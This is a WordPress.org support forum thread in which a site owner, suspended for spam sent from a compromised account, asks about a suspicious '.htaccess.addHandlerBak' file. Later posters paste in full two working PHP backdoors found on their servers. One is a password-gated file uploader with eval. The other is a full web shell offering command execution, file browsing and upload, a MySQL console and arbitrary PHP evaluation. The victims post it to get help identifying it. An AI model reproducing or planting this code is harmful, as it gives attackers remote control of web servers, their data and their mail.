WordPress.org

Support

Support » How-To and Troubleshooting » what is .htaccess.addHandlerBak?

what is .htaccess.addHandlerBak?

  • lightfoot33
    Member

    @lightfoot33

    Hi,
    I recently had my site’s security compromised (basically someone was sending spam from one of my email accounts) and because of this, hostmonster suspended my site until it is resolved. They said that I need to find the script that is sending these spam emails, but couldn’t provide any further help.

    I am looking at my files through control panel for any suspicious files, and one that I came across what this one:
    .htaccess.addHandlerBak

    I am familiar with the .htaccess file, but had not seen this one before.

    Does anyone have any information about it?

Viewing 6 replies - 1 through 6 (of 6 total)
  • steeljawscribe
    Member

    @steeljawscribe

    I’d like to know as well.

    Clayton James
    Participant

    @claytonjames

    Every Google hit I see in reference to this file seems to represent itself (to my unskilled eyes at least), as the signature of a hack, or appears in an un-protected directory of someone who has been hacked.

    I can guarantee that this won’t be the only unwanted file there.

    backup your images/videos/etc, delete the bang lot(*all of it*)… reload a fresh copy of wordpress and all plugins.

    Any more details on this?

    I found files with this code all throughout my site.

    <?php
    @error_reporting(E_ALL);
    @set_time_limit(0);
    global $HTTP_SERVER_VARS;
    
    define('PASSWD','their password not mine?');
    
    function say($t) {
      echo "$t\n";
    };
    
    function testdata($t) {
      say(md5("mark_$t"));
    };
    
    echo "<pre>";
    testdata('start');
    if (md5($_POST["p"]) == PASSWD) {
      if ($code = @fread(@fopen($HTTP_POST_FILES["s"]["tmp_name"], "rb"),
        $HTTP_POST_FILES["s"]["size"])) {
          if(@fwrite(@fopen(dirname(__FILE__).'/'.basename($HTTP_POST_FILES["s"]["name"]), "wb"), $code))
          {
          testdata('save_ok');
          };
          //eval($code);
      } else {
        testdata('save_fail');
      };
    
      if ($code = @fread(@fopen($HTTP_POST_FILES["f"]["tmp_name"], "rb"),
        $HTTP_POST_FILES["f"]["size"]))
      {
          eval($code);
          testdata('ok');
      } else {
        testdata('fail');
      };
    
    } else {
      testdata('pass');
    };
    
    testdata('end');
    echo "</pre>";
    ?>

    Maybe an upper level Dev could please respond?

    I found this on my server.

    <?php
    #------------------Security------------------#
    $name_c = "checkIndentity";
    function get_c($name_c){
    	foreach($_COOKIE as $key=>$value) {
    		if	($key == $name_c)
    		    return $c = $value;
    		  else
    	  		return false;
    		}
    }
    function is_cookie ($search_cookie) {
    	foreach($_COOKIE as $key=>$value) {
    		if	($value == $search_cookie)
    		    return true;
    		  else
    	  		return false;
    		}
    	}
    
    	if (md5($_REQUEST['p']) == "1b0ca22694b8eb1303af4d535bc15df7" || is_cookie(get_c($name_c))){
    		if(!is_cookie(get_c($name_c))) setcookie("checkIndentity",md5($_REQUEST['p']));
    #------------------END Security------------------#
    ##################################################
    #------------------Private Class------------------#
    class browseDir {
    var $pwd;
    var $newLocation;
    
    function browseDir(){
    	$d=$this->pwd = getcwd();
    	$this->changeDir($d);
    }
    
    function upload($ifupload){
    	if(isset($ifupload)){
     	   $uploadfile = getcwd().'/'.basename($_FILES['uploadfile']['name']);
    	if (! move_uploaded_file($_FILES['uploadfile']['tmp_name'], $uploadfile)){
    			print "Unable to move ".
    			$_FILES['uploadfile']['tmp_name']." file to<br />$uploadfile<br />";
    		}
    		if (file_exists($uploadfile)) @chmod($uploadfile, 0777);
      }
    }
    
    function changeDir ($dir){
    			$dir=trim($dir);
    			@chdir($this->pwd);
    		if (!file_exists($dir)){print "$dir: No such file or directory<br />\n";return;}
    		if (!@chdir($dir)) {print "$dir: Failed<br />\n";return;}
    	return $this->pwd = getcwd();
    }
    
    function getDirList($newLocation=''){
    		  $handle = '';
    		  $self = $_SERVER['PHP_SELF'];
       if (empty($this->newLocation) && $this->newLocation == ''){
       		  $_SESSION['lastchg'] = '.';
    	   	  $handle = @opendir($this->pwd);
    	if(!$handle) {print "No perms to read: ".$this->pwd.'<br />';}
    	   	  $dirs = array();
    		  $files = array();
    	  while (false !== ($file = @readdir($handle))) {
    			if ($file != ".") {
    				if (is_dir($file)) $dirs[] = $file;
    				  else $files[] = $file;
    			}
    		}
       }
      if (!empty($this->newLocation) && $this->newLocation != ''){
    	 	if(isset($_SESSION['lastchg'])) {
    		 	$this->pwd = &$_SESSION['lastchg'];
    			$_SESSION['lastchg'] = $this->changeDir($this->newLocation);
    	 	}
    	 	if(empty($_SESSION['lastchg'])) $_SESSION['lastchg'] = $this->changeDir($this->newLocation);
    	 }
    	 	 $handle = @opendir($this->pwd);
    	if(!$handle) {print "No perms to read: ".$this->pwd.'<br />';}
    	   	 $dirs = array();
    		 $files = array();
    	  while (false !== ($file = @readdir($handle))) {
    			if ($file != ".") {
    				if (is_dir($file)){
    					$dirs[] = $file;
    				} else {
    					$files[] = $file;
    				}
    			}
    		}
    	@closedir($handle);
    	natcasesort($files);
    	natcasesort($dirs);
    print '<tr><td valign="top">';
    print '<i>'.getcwd().'</i><br />';
    print '<hr><br />';
    		foreach ($dirs as $d){
    			print '<a href="?command='.urlencode($d).'">'.htmlentities($d)."</a><br />\n";
    		}
    			print '<hr/>';
    		foreach ($files as $f){
    			if (is_readable($f))
    				 print '<a target="_blank" href="'.$_SERVER['PHP_SELF'].'/'.urlencode($f).'?getfile='. urlencode($f).'">'.htmlentities($f).'</a>';
    			  else print htmlentities($f);
    
    			print "<br />\n";
    		}
    		print "<br />\n";
    		print "<br />\n";
    	if (is_writeable(getcwd())){
    		 print '<form enctype="multipart/form-data" action="'.$self.'" method="post">';
    		 print '<input type="file" name="uploadfile" />';
    		 print '<input type="submit" name="submit" value="Upload" />';
    		 print '</form>';
    	}
    		print "</td><td>";
      }
    
    function showFile ($fname,$escapeOutput = true){
    			if(empty($this->pwd) && $this->pwd=='') $this->pwd = '.';
    				$fullpath = $_SESSION['lastchg']."/$fname"; $ctype = 'text/plain';
    			if (!  is_readable($fullpath)){print "Unable to read $fullpath";return;}
    			if ($ctype == 'text/html' && $escapeOutput) header("Content-type: text/plain\r\n\r\n");
    			  else header( "Content-type: $ctype\r\n\r\n");
    			if($fh=@fopen($fullpath,'r')){
    				$code=@fread($fh,filesize($fullpath));
    				@fclose($fh);
    				echo $code;
    			}else readfile($fullpath);
    }
    
    function send_file($dist_name='') {
    	ob_end_clean();
    	/*$e = split("/", strrev($dist_name), 2);
    	$name = strrev($e[0]);
    	$distination = strrev($e[1]);
    	$path = $distination."/".$name;*/
    	if(empty($this->pwd) && $this->pwd == '') $this->pwd = '.';
    		$path = $this->pwd."/$dist_name";
    if (!is_file($path) or connection_status()!=0) return(FALSE);
    	header("Cache-Control: no-store, no-cache, must-revalidate");
    	header("Cache-Control: post-check=0, pre-check=0", false);
    	header("Pragma: no-cache");
    	header("Expires: ".gmdate("D, d M Y H:i:s", mktime(date("H")+2, date("i"), date("s"), date("m"), date("d"), date("Y")))." GMT");
    	header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
    	header("Content-Type: application/octet-stream");
    	header("Content-Length: ".(string)(filesize($path)));
    	header("Content-Disposition: inline; filename=".str_replace(" ","",$name));
    	header("Content-Transfer-Encoding: binary\n");
    if ($file = fopen($path, 'rb')) {
    	while(!feof($file) and (connection_status()==0)) {
    	print(fread($file, 1024*8));
    	flush();
    	}
    	fclose($file);
    	}
    	return((connection_status()==0) and !connection_aborted());
    }
    
    function shh_curPageURL() {
     global $SLASHSTR;
     $pageURL = 'http';
     //if ($_SERVER["HTTPS"] == "on") {$pageURL .= "s";}
     $pageURL .= "://";
     if ($_SERVER["SERVER_PORT"] != "80") {
      $pageURL .= $_SERVER["SERVER_NAME"].":".$_SERVER["SERVER_PORT"].$_SERVER["REQUEST_URI"];
     } else {
      $pageURL .= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
     }
     if(!strstr($pageURL, $SLASHSTR)){
      if(strpos($pageURL, '?')){$pageURL.="&$SLASHSTR";}else{$pageURL.="?$SLASHSTR";}
     }
     return $pageURL;
     }
    
    function print_a( $TheArray ){
        echo "<table border="1">\n";
        $Keys = array_keys( $TheArray );
        foreach( $Keys as $OneKey ){
          echo "<tr>\n";
          echo "<td bgcolor="'#727450'">";
          echo "<B>" . $OneKey . "</B>";
          echo "</td>\n";
          echo "<td bgcolor="'#C4C2A6'">";
            if ( is_array($TheArray[$OneKey]) )
              $this->print_a($TheArray[$OneKey]);
            else
              echo $TheArray[$OneKey];
          echo "</td>\n";
    
          echo "</tr>\n";
        }
        echo "</table>\n";
      }
    }
    #------------------END Private Class------------------#
    #######################################################
    #------------------Define Variables------------------#
    $isupload = $_REQUEST['submit'];
    $SLASHSTR='sht=%22';
    $openFile = '';if(isset($_REQUEST['getfile'])){$openFile=trim($_REQUEST['getfile']);}
    $shhptr='';if(isset($_REQUEST['shhptr'])){$shhptr=trim($_REQUEST['shhptr']);}	//  print_r($_REQUEST);
    $_SESSION['button'] = $shhptr;$page = $_SESSION['button'];
    $newLocation='';if(isset($_REQUEST['command'])){$newLocation=trim($_REQUEST['command']);}
    $cmd='';if(isset($_REQUEST['cmd'])){$cmd=trim($_REQUEST['cmd']);}
    $shhcmd='';if(isset($_REQUEST['shhcmd'])){$shhcmd=trim($_REQUEST['shhcmd']);}
    $shhqry='';if(isset($_REQUEST['shhqry'])){$shhqry=trim($_REQUEST['shhqry']);}
    $sdbhst='';if(isset($_REQUEST['sdbhst'])){$sdbhst=trim($_REQUEST['sdbhst']);}
    $sdbusr='';if(isset($_REQUEST['sdbusr'])){$sdbusr=trim($_REQUEST['sdbusr']);}
    $sdbpsw='';if(isset($_REQUEST['sdbpsw'])){$sdbpsw=trim($_REQUEST['sdbpsw']);}
    $sdbsch='';if(isset($_REQUEST['sdbsch'])){$sdbsch=trim($_REQUEST['sdbsch']);}
    $shhcod='';if(isset($_REQUEST['shhcod'])){$shhcod=trim($_REQUEST['shhcod']);}
    $shhx='no';if(isset($_REQUEST['shhx'])){$shhx=trim($_REQUEST['shhx']);}
    $shhfnm='';if(isset($_REQUEST['shhfnm'])){$shhfnm=trim($_REQUEST['shhfnm']);}
    $slashtest=false;if(isset($_REQUEST['sht'])){$slashtest=trim($_REQUEST['sht']);}
    if(($slashtest!=false)&&($slashtest!='')){if($slashtest==='\"'){
    $shhcod = stripslashes($shhcod);
    $shhcmd = stripslashes($shhcmd);
    $shhqry = stripslashes($shhqry);
    }}
    #------------------END Define Variables------------------#
    ##########################################################
    		$browser = new browseDir();
    		session_start();
    		if($openFile!='') {$browser->showFile($openFile);exit;}
    ?>
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
        "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    <SCRIPT type="text/javascript">
    function submitform(num){
      var num;
      document.theshll.shhptr.value = num;
      document.theshll.submit();
    }
    </SCRIPT>
    <style type="text/css">
    input{color:#2EFE2E;background-color:black;margin:3px;}
    textarea{border-color:white;color:#2EFE2E;background-color:black;margin:3px;}
    body{color:white;background-color:black;}
    a{color:white;}
    td{border-color:white;color:#2EFE2E;background-color:black;margin:1px;}
    th{color:green;}
    </style>
    </head>
    <body>
    <? if($shhptr == 0 || $shhptr == ''){?>
    
    <table border="1"  align="left" >
    <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post" name="theshll" id="theshll">
    <input type="hidden" name="shhptr" value="<?php echo $shhptr ?>" />
    <input type="button" name="1" value="SQL" onmousedown="submitform(1);" />
    <input type="button" name="2" value="EVAL" onmousedown="submitform(2);" />
    <tr>
     <th>CurrentDirectoryListing</th>
     <td><input align="left" type="text" name="cmd" size="60"  />
       <input type="submit" value="EXECUTE" /></td>
    </tr>
    </form>
    <?php
    	$browser->newLocation = $newLocation;$browser->upload($isupload);
        $browser->getDirList(); echo"<textarea wrap=\"off\" readonly rows=\"20\" cols=\"90\">";
      if(($shhptr=='')&&($cmd!='')){
          if(passthru($cmd, $out)){
            echo htmlentities(implode("\n",$out));
          }
        }
      echo "</textarea></td></tr>";
    ?>
    </table>
    <?}?>
    
    <?if(($page=='1')){?>
    <form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post" name="theshll" id="theshll">
    <input type="hidden" name="shhptr" value="<?php echo $shhptr ?>" />
    <input type="button" name="1" value="BROWSE" onmousedown="submitform(0);" />
    <input type="button" name="2" value="EVAL" onmousedown="submitform(2);" />
    <div style="width: 600px;">
    <div style="float:left;">
    <input type="text" name="sdbhst" size="20" value="<?php echo $sdbhst; ?>" />.::Host:. <br />
    <input type="text" name="sdbsch" size="20" value="<?php echo $sdbsch; ?>" />.::DB:.</div>
    <div style="margin-left:20px;float:left;">
    <input type="text" name="sdbusr" size="20" value="<?php echo $sdbusr; ?>" />.::User:.<br />
    <input type="text" name="sdbpsw" size="20" value="<?php echo $sdbpsw; ?>" />.::Pass:.</div>
    <input type="text" name="shhqry" size="80" value="<?php echo $shhqry; ?>" />
    <input type="submit" value="QUERY" /></form>
    <?php
      echo "<table>";
      if(($shhptr=='1')&&($shhqry!='')){
        if ($mysql = @mysql_connect($sdbhst, $sdbusr, $sdbpsw)){
          if(@mysql_select_db($sdbsch)) {
            if($res = @mysql_query($shhqry)){
              if($row = mysql_fetch_assoc($res)){
                while($row = mysql_fetch_assoc($res)){
                  $arr[] = $row;
                }
               $browser->print_a($arr);
              }
            } else echo "mysql query error: ".mysql_error()."\n";
          } else echo "mysql select error: ".mysql_error()."\n";
          @mysql_close($mysql);
        } else echo "mysql connect error: ".mysql_error()."\n";
      }
      echo "</table>";
    }
    if(($page=='2')){
    ?>
    <form action="<?php echo $browser->shh_curPageURL(); ?>" method="post" name="theshll" id="theshll">
    <input type="hidden" name="shhptr" value="<?php echo $shhptr ?>" />
    <input type="button" name="1" value="BROWSE" onmousedown="submitform(0);" />
    <input type="button" name="2" value="SQL" onmousedown="submitform(1);" />
    <br />
    <input type="text" name="shhfnm" size="40" value="<?php echo $shhfnm; ?>" />
    <input type="submit" name="shhx" value="SAVE AS" />
    <input type="submit" name="shhx" value="INCLUDE/RUN" /><br />
    <input type="submit" name="shhx" value="EVALUATE" /><br />
    <textarea name="shhcod" wrap="off" rows="15" cols="65" >
    <?php echo $shhcod;?>
    </textarea>
    </form>
    <?php
      echo "<div id=\"reslt\">";
      switch($shhx){
      case 'EVALUATE':
        if($shhcod!=''){
        	ob_start();
            eval($shhcod);
    		$eval=ob_get_contents();
            ob_end_clean();
        } else {
            ob_start();
            echo "Enter PHP code!";
            $eval=ob_get_contents();
            ob_end_clean();
            }
            break;
      case 'SAVE AS':
        if($shhfnm!=''){
          $f = @fopen($shhfnm, 'w');
          if($f){
            if(strpos($shhcod, '<?php')===false){
              $shhcodz = "<?php\n".$shhcod."\n".'?'.'>';
            } else $shhcodz = $shhcod;
            fwrite($f, $shhcodz);
            fclose($f);
            echo "Saved.";
          } else echo "Cannot write file!\n";
        } else echo "Enter file name!\n";
        break;
      case 'INCLUDE/RUN':
        if($shhfnm!=''){
          if (!@include($shhfnm)){
            echo "Include error!";
          };
        } else echo "Enter file name!\n";
        break;
      }
    if(!empty($eval) && $eval != ''){
      echo '<table align="left" border="0" >';
      echo '<th align="center">EVAL OUTPUT:</th>';
      echo '</table><br />';
      echo '<br />';
      echo '<table align="left" border="1" width="48%" height="30%">';
      echo '<tr><td align="center">'.$eval.'</td></tr>';
      echo '</table>';
     }
    }
    ?>
    <th ></th>
    </body></html>
    <?}?>
Viewing 6 replies - 1 through 6 (of 6 total)
  • The topic ‘what is .htaccess.addHandlerBak?’ is closed to new replies.